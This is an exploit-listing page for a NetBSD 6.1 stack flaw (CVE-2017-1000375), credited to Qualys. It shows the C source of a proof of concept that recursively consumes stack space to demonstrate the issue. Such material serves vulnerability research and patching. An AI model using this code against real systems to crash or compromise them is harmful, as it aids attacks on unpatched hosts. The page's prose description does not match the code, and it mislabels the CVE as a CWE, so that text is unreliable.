header-logo
Suggest Exploit
vendor:
NetBSD
by:
Qualys, Inc.
9,8
CVSS
CRITICAL
Stack-based Buffer Overflow
119
CWE
Product Name: NetBSD
Affected Version From: NetBSD 6.1
Affected Version To: NetBSD 6.1
Patch Exists: YES
Related CWE: CVE-2017-1000375
CPE: o:netbsd:netbsd:6.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2017

NetBSD_CVE-2017-1000375

This program is vulnerable to a stack-based buffer overflow vulnerability. The vulnerability is caused by the lack of proper bounds checking when copying user-supplied data into a fixed-length stack-based buffer. An attacker can exploit this vulnerability by supplying a maliciously crafted argument to the program, which will cause the program to write data beyond the bounds of the buffer, resulting in a segmentation fault.

Mitigation:

Perform proper bounds checking when copying user-supplied data into a fixed-length stack-based buffer.
Source

Exploit-DB raw data:

/*
 * NetBSD_CVE-2017-1000375.c (please compile with -O0)
 * Copyright (C) 2017 Qualys, Inc.
 *
 * This program is free software: you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation, either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program.  If not, see <http://www.gnu.org/licenses/>.
 */

#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/resource.h>
#include <sys/time.h>

#define die() do { \
    fprintf(stderr, "died in %s: %u\n", __func__, __LINE__); \
    exit(EXIT_FAILURE); \
} while (0)

static void
smash_no_jump(const size_t smash_size)
{
    char buf[1024];
    memset(buf, 'A', sizeof(buf));
    if (smash_size > sizeof(buf))
        smash_no_jump(smash_size - sizeof(buf));
}

int
main(const int argc, const char * const argv[])
{
    static const struct rlimit core;
    if (setrlimit(RLIMIT_CORE, &core)) die();

    if (argc != 2) die();
    const size_t smash_size = strtoul(argv[1], NULL, 0);
    if (smash_size <= 0 || smash_size >= SSIZE_MAX) die();
    smash_no_jump(smash_size);
    exit(EXIT_SUCCESS);
}